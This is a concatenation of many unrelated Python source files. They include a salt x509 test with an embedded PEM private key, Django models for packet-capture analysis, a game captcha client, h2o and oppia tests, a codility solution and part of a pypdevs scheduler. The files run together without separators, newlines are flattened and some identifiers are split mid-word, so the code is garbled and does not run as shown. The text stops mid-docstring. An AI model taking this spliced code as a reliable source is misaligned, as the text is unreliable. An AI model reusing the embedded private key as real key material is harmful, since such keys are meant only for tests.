5TcgWYqDrmE9AEgJZjN+gnEPcsxc50HJaTQgrkV0oKrS8CMbStIymbzMKWifOj7o gvQBVecydq1AaXePt3gRe8vBFiP4cHjFcSegs9FDvdfJR36i
HOBIgEp4DWvV1vgs +z82LT6Qy5kxUQvnlQ4dEaGdrQKBgQD175f0H4enRJ3BoWTrqt2mTAwtJcPsKmGD 9YfFB3H4+O2rEKP4FpBO5PFXZ0dqm54hDtxqyC/lSXorFCUjVUBero1ECGt6Gnn2 TSnhgk0VMxvhnc0GReIt4K9WrXGd0CMUDwIhFHj8k
bb1X1yqt2hwyw7b10xFVStl sGv8CQB+VQKBgAF9q1VZZwzl61Ivli2CzeS/IvbMnX7C9ao4lK13EDxLLbKPG/CZ UtmurnKWUOyWx15t/viVuGxtAlWO/rhZriAj5g6CbVwoQ7DyIR/ZX8dw3h2mbNCe buGgruh7wz9J0RIcoadMOySiz7SgZS++/QzRD8HDstB77loco8zAQfixAoGBALDO FbTocfKbjrpkmBQg24YxR9OxQb/n3AEtI/VO2+38r4h6xxaUyhwd1S9bzWjkBXOI poeR8XTqNQ0BR422PTeUT3SohPPcUu/yG3jG3zmta47wjjPDS85lqEgtGvA0cPN7 srErcatJ6nlOnGUSw9/K65y6lFeH2lIZ2hfwNM2dAoGBAMVCc7i3AIhLp6UrGzjP 0ioCHCakpxfl8s1VQp55lhHlP6Y4RfqT72Zq7ScteTrisIAQyI9ot0gsuct2miQM nyDdyKGki/MPduGTzzWlBA7GZEHnxbAILH8kWJ7eE/Nh7zdF1CRts8utEO9L9S+0 lVz1j/xGOseQk4cVos681Wpw -----END PRIVATE KEY-----""" ) test_cert = dedent( """ -----BEGIN CERTIFICATE----- MIIDazCCAlOgAwIBAgIUAfATs1aodKw11Varh55msmU0LoowDQYJKoZIhvcNAQEL BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0yMTAzMjMwMTM4MzdaFw0yMjAz MjMwMTM4MzdaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB AQUAA4IBDwAwggEKAoIBAQDx7UUt0cPi5G51FmRBhAZtZb5x6P0PFn7GwnLmSvLN hCsOcD/vq/yBUU62pknzmOjM5pgWTACZj66OGOFmWBg06v8+sqUbaF9PZ/CxQD5M ogmQhYNgfyuopHWWgLXMub2hlP+15qGohkzgTr/mXp2ohVAb6ihjqb7XV9MiZaLN VX+XWauM8SlhqXMiJyDUopEGbg2pLsHhIMcX1twLlyDja+uDbCMZ4jDNB+wsWxTa PRH8KizfEabB1Cl+fdyD10pSAYcodOAnlkW+G/DX2hwb/ZAM9B1SXTfZ3gzaIIbq XBEHcZQNXxHL7szBTVcOmfx/RPfOeRncytb9Mit7RIBxAgMBAAGjUzBRMB0GA1Ud DgQWBBT0qx4KLhozvuWAI9peT/utYV9FITAfBgNVHSMEGDAWgBT0qx4KLhozvuWA I9peT/utYV9FITAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQDx tWvUyGfEwJJg1ViBa10nVhg5sEc6KfqcPzc2GvatIGJlAbc3b1AYu6677X04SQNA dYRA2jcZcKudy6eolPJow6SDpkt66IqciZYdbQE5h9elnwpZxmXlJTQTB9cEwyIk 2em5DKpdIwa9rRDlbAjAVJb3015MtpKRu2gsQ7gl5X2U3K+DFsWtBPf+0xiJqUiq rd7tiHF/zylubSyH/LVONJZ6+/oT/qzJfxfpvygtQWcu4b2zzME/FPenMA8W6Rau ZYycQfpMVc7KwqF5/wfjnkmfxoFKnkD7WQ3qFCJ/xULk/Yn1hrvNeIr+khX3qKQi Y3BMA5m+J+PZrNy7EQSa -----END CERTIFICATE----- """ ) fp, name = tempfile.mkstemp() with salt.utils.files.fopen(name, "w") as fd: fd.write(test_key) fd.write(test_cert) ret = x509.private_key_managed(name) self.file_managed_mock.assert_called_once() assert ( self.file_managed_mock.call_args.kwargs["contents"].strip() == test_key.strip() ) def test_certificate_info_matches(self): cert_info = {"MD5 Finger Print": ""} required_info = {"MD5 Finger Print": ""} ret = x509._certificate_info_matches(cert_info, required_info) assert ret == (False, ["MD5 Finger Print"])
import re print " Wri
te product name : " nume_produs = raw_input() print " Write product price : " cost_produs = input() if (nume_produs == re.sub('[^a-z]',"",nume_produs)
): print ('%s %d'%(nume_produs,cost_produs)) else: print "Error ! You must tape letters" input()
from _sha256 import sha256 from typing import Optional from common.serializers.serialization import domain_state_serializer from plenum.common.constants import DOMAIN_LEDGER_ID from plenum.common.request import Request from plenum.common.txn_util import get_payload_data, get_from, get_req_id from plenum.server.database_manager import DatabaseManager from plenum.server.request_handlers.handler_interfaces.write_request_handler import WriteRequestHandler from plenum.test.constants import BUY from stp_core.common.log import getlogger logger = getlogger() class BuyHandler(WriteRequestHandler): def __init__(self,
database_manager: DatabaseManager): super().__init__(database_manager, BUY, DOMAIN_LEDGER_ID) def static_validation(self, request: Request): self._validate_request_type(request) def dynamic_validation(self, request: Request, req_pp_time: Optional[int]): self._validate_request_type(request) def update_state(self, txn, prev_result, request, is_committed=False): self._validate_txn_type(txn) key = self.gen_s
tate_key(txn) value = domain_state_serializer.serialize({"amount": get_payload_data(txn)['amount']}) self.state.set(key, value) logger.trace('{} after adding to state, headhash is {}'. format(self, self.state.headHash)) def gen_state_key(self, txn): identifier = get_from(txn) req_id = get_req_id(txn) return self.prepare_buy_key(identifier, req_id) @staticmethod def prepare_buy_key(identifier, req_id): return sha256('{}{}:buy'.format(identifier, req_id).encode()).digest() def __repr__(self): return "TestHandler"
import os import finder import re import sys def makefilter(name, xtrapath=None): typ, nm, fullname = finder.identify(name, xtrapath) if typ in (finder.SCRIPT, finder.GSCRIPT, finder.MODULE): return ModFilter([os.path.splitext(nm)[0]]) if typ == finder.PACKAGE: return PkgFilter([fullname]) if typ == finder.DIRECTORY: return DirFilter([fullname]) if typ in (finder.BINARY, finder.PBINARY): return FileFilter([nm]) return FileFilter([fullname]) class _Filter: def __repr__(self): return '<'+self.__class__.__name__+' '+repr(self.elements)+'>' class _NameFilter(_Filter): """ A filter mixin that matches (exactly) on name """ def matches(self, res): return self.elements.get(res.name, 0) class _PathFilter(_Filter): """ A filter mixin that matches if the resource is below any of the paths""" def matches(self, res): p = os.path.normcase(os.path.abspath(res.path)) while len(p) > 3: p = os.path.dirname(p) if self.elements.get(p, 0): return 1 return 0 class _ExtFilter(_Filter): """ A filter mixin that matches based on file extensions (either way) """ include = 0 def matches(self, res): fnd = self.elements.get(os.path.splitext(res.path)[1], 0) if self.include: return not fnd return fnd class _TypeFilter(_Filter): """ A filter mixin that matches on resource type (either way) """ include = 0 def matches(self, res): fnd = self.elements.get(res.typ, 0) if self.include: return not fnd return fnd class _PatternFilter(_Filter): """ A filter that matches if re.search succeeds on the resource path """ def matches(self, res): for regex in self.elements: if regex.search(res.path): return 1 return 0 class ExtFilter(_ExtFilter): """ A file extension filter. ExtFilter(extlist, include=0) where extlist is a list of file extensions """ def __init__(self, extlist, include=0): self.elements =
{} for ext in extlist: if ext[0:1] != '.': ext = '.'+ext self.elements[ext] = 1 self.include = include class TypeFilter(_TypeFilter): """ A filter for resource types. TypeFi
lter(typlist, include=0) where typlist is a subset of ['a','b','d','m','p','s','x','z'] """ def __init__(self, typlist, include=0): self.elements = {} for typ in typlist: self.elements[typ] = 1 self.include = include class FileFilter(_NameFilter): """ A filter for data files """ def __init__(self, filelist): self.elements = {} for f in filelist: self.elements[f] = 1 class ModFilter(_NameFilter): """ A filter for Python modules. ModFilter(modlist) where modlist is eg ['macpath', 'dospath'] """ def __init__(self, modlist): self.elements = {} for mod in modlist: self.elements[mod] = 1 class DirFilter(_PathFilter): """ A filter based on directories. DirFilter(dirlist) dirs may be relative and will be normalized. Subdirectories of dirs will be excluded. """ def __init__(self, dirlist): self.elements = {} for pth in dirlist: pth = os.path.normcase(os.path.abspath(pth)) self.elements[pth] = 1 class PkgFilter(_PathFilter): """At this time, identical to a DirFilter (being lazy) """ def __init__(self, pkglist): #warning - pkgs are expected to be full directories self.elements = {} for pkg in pkglist: pth = os.path.normcase(os.path.abspath(pkg)) self.elements[pth] = 1 class StdLibFilter(_PathFilter): """ A filter that excludes anything found in the standard library """ def __init__(self): pth = os.path.normcase(os.path.join(sys.exec_prefix, 'lib')) self.elements = {pth:1} class PatternFilter(_PatternFilter): """ A filter that excludes if any pattern is found in resource's path """ def __init__(self, patterns): self.elements = [] for pat in patterns: self.elements.append(re.compile(pat))
''' Created on Nov 17, 2011 @author: mmornati ''' from django.http import HttpResponse from django.ut
ils import simplejson as json import logging from celery.result import Asyn
cResult from webui.restserver.template import render_agent_template import sys logger = logging.getLogger(__name__) def get_progress(request, taskname, taskid): logger.info("Requesting taskid: %s"%taskid) result = AsyncResult(taskid, backend=None, task_name=taskname) logger.info("TASKID: %s"%result.task_id) dict = {} if (result.state == 'PENDING'): dict['state'] = 'Waiting for worker to execute task...' elif (result.state == 'PROGRESS'): dict['state'] = 'Operation in progress..' else: dict['state'] = result.state backend_response = None try: backend_response = result.result except: logger.warn(sys.exc_info()) if backend_response: if isinstance(result.result, tuple): response,content,agent,action=result.result if response.status == 200: json_data = render_agent_template(request, {}, content, {}, agent, action) return HttpResponse(json_data, mimetype="application/json") elif response.status == 408: dict['state'] = 'FAILURE' dict['message'] = 'TIMEOUT' else: if "current" in result.result and "total" in result.result: value = float(1.0*result.result['current']/result.result['total'])*100 dict['value'] = value else: dict.update({"responsecontent": result.result}) else: dict['value'] = 0 json_data = json.dumps(dict) return HttpResponse(json_data, mimetype="application/json")
from django.db import models from djangotoolbox.fields import EmbeddedModelField, ListField from django_mongodb_engine.contrib import MongoDBManager import os # Create your models here. # save the created json file name path # only one file for summary should be kept here class UserJSonFile(models.Model): user_id = models.CharField(max_length=100) json_type = models.CharField(max_length=10) # possible value is summary for the summary view json_file_name = models.CharField(max_length=100) # save the name of the already created file name on disk class Flow(models.Model): user_id = models.CharField(max_length=100) hash_value = models.CharField(max_length=50) file_name = models.CharField(max_length=50) upload_time = models.DateTimeField() file_type = models.CharField(max_length=150) file_size = models.IntegerField() path = models.FilePathField() pcaps = ListField(EmbeddedModelField('Pcap', null=True, blank=True)) details = ListField(EmbeddedModelField('FlowDetails', null=True, blank=True)) def __unicode__(self): return u'%s/%s' % (self.path, self.file_name) def get_upload_path(self): hash_dir = os.path.basename(self.path) root = os.path.basename(os.path.dirname(self.path)) return os.path.join(root, hash_dir) class Pcap(models.Model): hash_value = models.CharField(max_length=100) file_name = models.FileField(upload_to="uploads", null=True, blank=True) path = models.FilePathField() packets = ListField(EmbeddedModelField('PacketDetails', null=True, blank=True)) def __unicode__(self): return u'%s/%s' % (self.path, self.file_name) def get_upload_path(self): hash_dir = os.path.basename(self.path) root = os.path.basename(os.path.dirname(self.path)) return os.path.join(root, hash_dir) # there should be also a table of fields that kepts the traffic bytes related with communication class PacketDetails(models.Model): #datetime.datetime.fromtimestamp(float("1286715787.71")).strftime('%Y-%m-%d %H:%M:%S') ident = models.IntegerField() flow_hash = models.CharField(max_length=50) timestamp = models.DateTimeField() length = models.IntegerField() protocol = models.IntegerField() src_ip = models.IPAddressField() dst_ip = models.IPAddressField() sport = models.IntegerField() dport = models.IntegerField() data = models.TextField(null=True, blank=True) def __unicode__(self): return u'(%s, %s, %s, %s, %s)' % (self.protocol, self.src_ip, self.sport, self.dst_ip, self.dport) objects = MongoDBManager() # save the ips at the applayerproto.log (http.log for ex) class FlowDetails(models.Model): parent_hash_value = models.CharField(max_length=50) user_id = models.CharField(max_length=100) src_ip = models.IPAddressField() dst_ip = models.IPAddressField() sport = models.IntegerField() dport = models.IntegerField() protocol = models.CharField(max_length=10) timestamp = models.DateTimeField() objects = MongoDBManager() class HTTPDetails(models.Model): # request or response http_type = models.CharField(max_length=10) # request fields method = models.CharField(max_length=5, null=True, blank=True) uri = models.URLField(null=True, blank=True) headers = models.TextField(null=True, blank=True) ve
rsion = models.FloatField(null=True, blank=True) # request part ends # response fields # header and version is here also reason = models.CharField(max_length="5", null=True, blank=True) status = models.IntegerField(null=True, blank=True) # i might need body body = models.TextField(null=True, blank=True) content_type = models.CharField(max_length=25, null=Tru
e, blank=True) content_encoding = models.CharField(max_length=25, null=True, blank=True) # response ends # i might need files also files = ListField(null=True, blank=True) file_path = models.CharField(max_length=200, null=True, blank=True) flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True) #for raw_qeuries, filtering according to flow_details will be possible objects = MongoDBManager() class DNSRequest(models.Model): type = models.IntegerField() human_readable_type = models.CharField(max_length=50) value = models.CharField(max_length=50, null=True, blank=True) flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True) objects = MongoDBManager() class DNSResponse(models.Model): type = models.IntegerField() human_readable_type = models.CharField(max_length=50) value = ListField(null=True, blank=True) flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True) objects = MongoDBManager() class SMTPDetails(models.Model): login_data = ListField(null=True, blank=True) msg_from = models.CharField(max_length=100, null=True, blank=True) rcpt_to = models.CharField(max_length=100, null=True, blank=True) raw = models.TextField(null=True, blank=True) msgdata = models.TextField(null=True, blank=True) attachment_path = ListField(null=True, blank=True) flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True) objects = MongoDBManager() def get_path_dict(self): #/home/oguz/git/ovizart/ovizart/uploads/16-06-12/a6a6defb7253043a55281d01aa66538a/smtp-messages/1/part-001.ksh result = [] for path in self.attachment_path: tmp = dict() r = path.split("uploads") file_name = os.path.basename(r[1]) tmp['file_name'] = file_name tmp['path'] = r[1] result.append(tmp) return result
from django.urls import reverse from oppia.test import OppiaTestCase from reports.models import DashboardAccessLog class ContextProcessorTest(OppiaTestCase): fixtures = ['tests/test_user.json', 'tests/test_oppia.json', 'tests/test_quiz.json', 'tests/test_permissions.json', 'tests/test_course_permissions.json', 'tests/test_question_indices.json', 'tests/awards/award-course.json', 'tests/test_certificatetemplate.json'] # home page not logged in def test_get_home_not_logged_in(self): dal_start_count = DashboardAccessLog.objects.all().count() self.client.get(reverse('oppia:index')) dal_end_count = DashboardAccessLog.objects.all().count() # shouldn't add a log for non logged in users self.assertEqual(dal_start_count, dal_end_count) # home page - all users - get def test_get_home_logged_in(self): for user in (self.admin_user, self.normal_user, self.teacher_user, self.staff_user): self.client.force_login(user=user) dal_start_count = DashboardAccessLog.objects.all().count() self.client.get(reverse('oppia:index'), follow=True) dal_end_count = DashboardAccessLog.objects.all().count() self.assertEqual(dal_start_count+1, dal_end_count) # home page - all users - post def test_post_home_logged_in(self): for user in (self.admin_user, self.normal_user, self.teacher_user, self.staff_user): self.client.force_login(user=user) dal_start_count = DashboardAccessLog.objects.all().count() self.client.post(reverse('oppia:index'), follow=True, data={'test': 'mytest'}) dal_end_count = Dashboa
rdAccessLog.objects.all().count() self.assertEqual(dal_start_count+1, dal_end_count) # admin pages get def test_get_admin(self): dal_start_count = DashboardAccessLog.objects.all().c
ount() self.client.force_login(user=self.admin_user) self.client.get(reverse('admin:oppia_course_changelist')) dal_end_count = DashboardAccessLog.objects.all().count() # shouldn't add a log for admin self.assertEqual(dal_start_count, dal_end_count) # admin pages post # api pages # sensitive info
import os, requests, tempfile, time, webbrowser import lacuna.bc import lacuna.exceptions as err ### Dev notes: ### The tempfile containing the captcha image is not deleted until solveit() ### ha
s been ca
lled. ### ### Allowing the tempfile to delete itself (delete=True during tempfile ### creation), or using the tempfile in conjunction with a 'with:' expression, ### have both been attempted. ### ### The problem is that, when using those auto-deletion methods, the tempfile ### is occasionally being removed from the system before the image viewer ### we're firing off actually gets a chance to read it. Everything is ### happening in the right order, it's just that the image viewer startup is ### too slow. ### ### Deleting the tempfile manually in solveit() works - don't decide to get ### clever and replace the unlink() in solveit() with some form of tempfile ### autodeletion without a lot of testing. class Captcha(lacuna.bc.LacunaObject): """ Fetches, displays, and solves graphical captchas. General usage will be:: cap = my_client.get_captcha() cap.showit() # display the captcha image cap.prompt_user() # ask the user for a solution cap.solveit() # check the user's solution """ path = 'captcha' @lacuna.bc.LacunaObject.call_returning_meth def fetch( self, **kwargs ): """ Fetches a captcha for the user to solve from the server. This mirrors the TLE API, but you generally don't need to call this. Returns a :class:`lacuna.captcha.Puzzle` object. """ return Puzzle( self.client, kwargs['rslt'] ) def showit( self ): """ Actually downloads the captcha image, and attempts to display it to the user in one of several browsers. If :meth:`fetch` is called first, :meth:`showit` uses that fetched data, but this is not necessary. :meth:`showit` will call fetch for you. Raises :class:`lacuna.exceptions.RequestError` if the image is not fetchable (network error or the TLE servers have gone down). Raises EnvironmentError if it cannot find an image viewer to use to display the captcha image. """ if not hasattr(self,'url') or not hasattr(self,'guid'): puzzle = self.fetch() self.url = puzzle.url self.guid = puzzle.guid img_resp = requests.get( self.url ) if img_resp.status_code != 200: raise err.RequestError("The captcha image URL is not responding.") f = tempfile.NamedTemporaryFile( suffix='.png', prefix='tle_capcha_', delete=False ); self.tempfile = f.name f.write( img_resp.content ) if hasattr(img_resp, 'connection'): img_resp.connection.close() local_url = 'file://' + f.name found_browser = False for b in [ None, 'windows-default', 'macosx', 'safari', 'firefox', 'google-chrome', 'chrome', 'chromium-browser', 'chromium' ]: try: browser = webbrowser.get( b ) browser.open( local_url, 0, True ) found_browser = True break except webbrowser.Error as e: pass if not found_browser: raise EnvironmentError("Unable to find a browser to show the captcha image. Captcha solution is required.") def prompt_user(self): """ Prompts the user to solve the displayed captcha. It's not illegal to call this without first calling :meth:`solveit`, but doing so makes no sense. """ self.resp = input("Enter the solution to the captcha here: ") return self.resp def solveit(self): """ Sends the user's response to the server to check for accuracy. Returns True if the user's response was correct. Raises :class:`lacuna.exceptions.CaptchaResponseError` otherwise. """ if not hasattr(self,'resp'): raise AttributeError("You must prompt the user for a response before calling solveit().") try: self.solve( self.guid, self.resp ) except err.ServerError as e: raise err.CaptchaResponseError("Incorrect captcha response") finally: delattr( self, 'url' ) delattr( self, 'guid' ) delattr( self, 'resp' ) if os.path.isfile(self.tempfile): os.unlink( self.tempfile ) return True @lacuna.bc.LacunaObject.call_member_meth def solve( self, guid:str, solution:str, **kwargs ): """ Mirrors the TLE Captcha module's :meth:`solve` method, but unless you really need this and you really know why, use :meth:`solveit` instead. """ pass class Puzzle(lacuna.bc.SubClass): """ Object Attributes:: url FQ URL to the puzzle image guid uuid attached to the puzzle; must be passed back along with the solution. """
from __future__ import unicode_literals import os.path from pre_commit.commands.clean import clean from pre_commit.util import rmtree def test_clean(runner_w
ith_mocked_store): assert os.path.exists(runner_with_mocked_store.store.directory) clean(runner_with_mocked_store) assert not os.pa
th.exists(runner_with_mocked_store.store.directory) def test_clean_empty(runner_with_mocked_store): """Make sure clean succeeds when we the directory doesn't exist.""" rmtree(runner_with_mocked_store.store.directory) assert not os.path.exists(runner_with_mocked_store.store.directory) clean(runner_with_mocked_store) assert not os.path.exists(runner_with_mocked_store.store.directory)
class Controller(object): def __init__(self, model): self._model = model self._view = None def register_view(self, view): self._view = view def on_quit(self, *args): raise NotImplementedErro
r def on_keybinding_activated(self, core, time): raise NotImplementedError def on_show_about(self, sender): raise NotImplementedError def on_toggle_history(self, sender): raise NotImplementedError def on_show_preferences(self, sender): raise NotImplementedError def on_query_entry_changed(self, entry): raise NotImplementedError def on_query_entry_key_press_even
t(self, entry, event): raise NotImplementedError def on_query_entry_activate(self, entry): raise NotImplementedError def on_treeview_cursor_changed(self, treeview): raise NotImplementedError def on_match_selected(self, treeview, text, match_obj, event): raise NotImplementedError def on_do_default_action(self, treeview, text, match_obj, event): raise NotImplementedError def on_action_selected(self, treeview, text, action, event): raise NotImplementedError def on_clear_history(self, sender): raise NotImplementedError def on_history_match_selected(self, history, text, match): raise NotImplementedError
# Copyright (C) 2016 Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> from ggrc.converters import errors from integration.ggrc import
converters class TestBasicCsvImport(converters.TestCase): def setUp(
self): converters.TestCase.setUp(self) self.client.get("/login") def test_policy_basic_import(self): filename = "ca_setup_for_deletion.csv" self.import_file(filename) filename = "ca_deletion.csv" response_data_dry = self.import_file(filename, dry_run=True) response_data = self.import_file(filename) self.assertEqual(response_data_dry, response_data) self.assertEqual(response_data[0]["deleted"], 2) self.assertEqual(response_data[0]["ignored"], 0)
import setuptools with open("README.md", "r") as fh: long_description = fh.read() with open('requirements.txt') as f: requirements = f.read().splitlines() with open('cli-requirements.txt') as f: cli_requirements = f.read().splitlines() setuptools.setup( name="uwg", use_scm_version=True, setup_requires=['setuptools_scm'], author="Ladybug Tools", author_email="info@ladybug.tools", description="Python application for modeling the urban heat island effect.", long_description=long_description, long_description_content_type="text/markdown", url="https://github.com/ladybug-tools/uwg", packages=setuptools.find_packages(exclude=["tests*", "resources*"]), include_package_data=True, install_requires=requirements, extras_require={ 'cli': cli_requirements }, entry_points={ "console_scripts": ["uwg = uw
g.cli:main"] }, classifiers=[ "Programming Language :: Python :: 2.7", "Programming Language :: Python :: 3.6", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: Implementation :: CPython", "License :: OSI Approved :: GNU General Public License v3 (GPLv3)", "Operating System :: OS Independe
nt" ], )
from collections import UserList from gear import ffxiv, xivdb from gear import power as p """Class representing a simple gear element. """ class Gear(object): """Gear(slot, item_id, **attributes) slot : in which slot of the gearset is this precise gear, as defined in ffxiv.slots.
item_id : identifier from xivdb.com. Will load the gear from there if provided attributes : the attributes of the gear as defined in ffxiv.attributes. """ def __init__(self, slot, item_id = None, **attributes): if item_id is not None : attributes = xivdb.getId(item_id)
assert(slot in ffxiv.slots) self.slot = slot # We filter out what is not a legitimate FFXIV attribute self.attributes = dict(filter( lambda a:a[0] in ffxiv.attributes, attributes.items())) # We put the rest in self.misc self.misc = dict(filter( lambda a:a[0] not in ffxiv.attributes, attributes.items())) """Class representing a complete gear set. Can be called by specifying the Lodestone ID for the character or by specifying the gear for each gear slot, as defined in ffxiv.slots. """ class GearSet(Gear): """GearSet(character_id, **gears) character_id : provide to load gearset from Lodestone. gears : pairs slot=Gear """ def __init__(self, character_id=None, **gears ): self.gears = {} # If we do not fetch the gearset from Lodestone if character_id is None: for s in ffxiv.slots: g = gears.get(s) assert(g is None or g.slot == s) self.gear[s] = g else: pass #TODO add fetching gearset from Lodestone # A GearSet is treated as a Gear, so we update the attributes attributes = { k : sum( [g.attributes.get(k,0) for g in self.gears.values() if g is not None ], start=0) for k in ffxiv.attributes} super().__init__(None,*attributes) """List of GearSets to compare. """ class GearSetList(UserList): """GearSetList(data) data : an iterable of gearsets """ def __init__(self, data=[]): super().__init__(data) """maxPower(job,consraintList) Returns the best gearset for job given a list of constraints. """ def maxPower(self,job, constraintList=None): pass """Function to calculate the power of a gear for job. """ def power(gear, job): return sum([int(gear.attributes.get(k,0))*v for k,v in ffxiv.weights[job].items()])
import sys sys.path.insert(1, "../../../") import h2o def binop_plus(ip,port): # Connect to h2o h2o.init(ip,port) iris = h2o.import_frame(path=h2o.locate("smalldata/iris/iris_wheader_65_rows.csv")) rows, cols = iris.dim() iris.show() ################################################################### # LHS: scaler, RHS: H2OFrame res = 2 + iris res_rows, res_cols = res.dim() assert res_rows == rows and res_cols == cols, "dimension mismatch" for x, y in zip([res[c].sum() for c in range(cols-1)], [469.9, 342.6, 266.9, 162.2]): assert abs(x - y) < 1e-1, "expected same values" # LHS: scaler, RHS: scaler res = 2 + iris[0] res2 = 1.1 + res[21,:] assert abs(res2 - 8.2) < 1e-1, "expected same values" ################################################################### # LHS: scaler, RHS: H2OFrame res = 1.2 + iris[2] res2 = res[21,:] + iris res2.show()
# LHS: scaler, RHS: H2OVec res = 1.2 + iris[2] res2 = res[21,:] + iris[1] res2.show() # LHS: s
caler, RHS: scaler res = 1.1 + iris[2] res2 = res[21,:] + res[10,:] assert abs(res2 - 5.2) < 1e-1, "expected same values" # LHS: scaler, RHS: scaler res = 2 + iris[0] res2 = res[21,:] + 3 assert abs(res2 - 10.1) < 1e-1, "expected same values" ################################################################### # LHS: H2OVec, RHS: H2OFrame #try: # res = iris[2] + iris # res.show() # assert False, "expected error. objects with different dimensions not supported." #except EnvironmentError: # pass # LHS: H2OVec, RHS: scaler res = 1.2 + iris[2] res2 = iris[1] + res[21,:] res2.show() ################################################################### # LHS: H2OFrame, RHS: H2OFrame res = iris + iris res_rows, res_cols = res.dim() assert res_rows == rows and res_cols == cols, "dimension mismatch" res = iris[0:2] + iris[1:3] res_rows, res_cols = res.dim() assert res_rows == rows and res_cols == 2, "dimension mismatch" #try: # res = iris + iris[0:3] # res.show() # assert False, "expected error. frames are different dimensions." #except EnvironmentError: # pass # LHS: H2OFrame, RHS: H2OVec #try: # res = iris + iris[0] # res.show() # assert False, "expected error. objects of different dimensions not supported." #except EnvironmentError: # pass # LHS: H2OFrame, RHS: scaler res = 1.2 + iris[2] res2 = iris + res[21,:] res2.show() # LHS: H2OFrame, RHS: scaler res = iris + 2 res_rows, res_cols = res.dim() assert res_rows == rows and res_cols == cols, "dimension mismatch" for x, y in zip([res[c].sum() for c in range(cols-1)], [469.9, 342.6, 266.9, 162.2]): assert abs(x - y) < 1e-1, "expected same values" ################################################################### if __name__ == "__main__": h2o.run_test(sys.argv, binop_plus)
""" https://codility.com/programmers/task/equi_leader/ """ from collections import Counter, defaultdict def solution(A): def _is_equi_leader(i): prefix_cou
nt_top = running_counts[top] suffix_count_top = total_counts[top] - prefix_count_top return (prefix_count_top * 2 > i + 1) and (su
ffix_count_top * 2 > len(A) - i - 1) total_counts = Counter(A) running_counts = defaultdict(int) top = A[0] result = 0 for i in xrange(len(A) - 1): n = A[i] running_counts[n] += 1 top = top if running_counts[top] >= running_counts[n] else n if _is_equi_leader(i): result += 1 return result
# Copyright 2014 Modelling, Simulation and Design Lab (MSDL) at # McGill University and the University of Antwerp (http://msdl.cs.mcgill.ca/) # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ The No Age scheduler is based on the Heapset scheduler, though it does not take age into account. .. warning:: This scheduler does not take the age into account, making it **unusable** in simulations where the *timeAdvance* function can return (exactly) 0. If unsure, do **not** use this scheduler, but the more general Heapset scheduler. The heap will contain only the timestamps of events that should happen. One of the dictionaries will contain the actual models that transition at the specified time. The second dictionary than contains a reverse relation: it maps the models to their time_next. This reverse relation is necessary to know the *old* time_next value of the model. Because as soon as the model has its time_next changed, its previously scheduled time will be unknown. This 'previous time' is **not** equal to the *timeLast*, as it might be possible that the models wait time was interrupted. For a schedule, the model is added to the dictionary at the specified time_next. In case it is the first element at this location in the dictionary, we also add the timestamp to the heap. This way, the heap only contains *unique* timestamps and thus the actual complexity is reduced to the number of *different* timestamps. Furthermore, the reverse relation is also updated. Unscheduling is done similarly by simply removing the element from the dictionary. Rescheduling is a slight optimisation of unscheduling, followed by scheduling. This scheduler does still schedule models that are inactive (their time_next is infinity), though this does not influence the complexity. The complexity is not affected due to infinity being a single element in the heap that is always present. Since a heap has O(log(n)) complexity, this one additional element does not have a serious impact. The main advantage over the Activity Heap is that it never gets dirty and thus doesn't require periodical cleanup. The only part that gets dirty is the actual heap, which only contains small tuples. Duplicates of these will also be reduced to a single element, thus memory consumption should not be a problem in most cases. This scheduler is ideal in situations where most transitions happen at exactly the same time, as we can then profit from the internal structure and simply return the mapped elements. It results in sufficient efficiency in most other cases, mainly due to the code base being a lot smaller then the Activity Heap. """ from heapq import heappush, heappop from pypdevs.logger import * class SchedulerNA(object): """ Scheduler class itself """ def __init__(self, models, epsilon, total_models): """ Constructor :param models: all models in the simulation """ self.heap = [] self.reverse = [None] * total_models self.mapped = {} self.infinite = float('inf') # Init the basic 'inactive' entry here, to prevent scheduling in the heap itself self.mapped[self.infinite] = set() self.epsilon = epsilon for m in models: self.schedule(m) def schedule(self, model): """ Schedule a model :param model: the model to schedule """ try: self.mapped[model.time_next[0]].add(model) except KeyError: self.mapped[model.time_next[0]] = set([model]) heappush(self.heap, model.time_next[0]) try: self.reverse[model.model_id] = model.time_next[0] except IndexError: self.reverse.append(model.time_next[0]) def unschedule(self, model): """ Unschedule a model :param model: model to unschedule """ try: self.mapped[self.reverse[model.model_id]].remove(model) except KeyError: pass self.reverse[model.model_id] = None def massReschedule(self, reschedule_set): """ Reschedule all models provided. Equivalent to calling unschedule(model); schedule(model) on every element in the iterable. :param reschedule_set: iterable containing all models to reschedule """ #NOTE the usage of exceptions is a lot better for the PyPy JIT and nets a noticable speedup # as the JIT generates guard statements for an 'if' for model in reschedule_set: model_id = model.model_id try: self.mapped[self.reverse[model_id]].remove(model) except KeyError: # Element simply not present, so don't need to unschedule it pass self.reverse[model_id] = tn = model.time_next[0] try: self.mapped[tn].add(model) except KeyError: # Create a tuple with a single entry and use it to initialize the mapped entry self.mapped[tn] = set((model, )) heappush(self.heap, tn) def readFirst(self): """ Returns the time
of the f
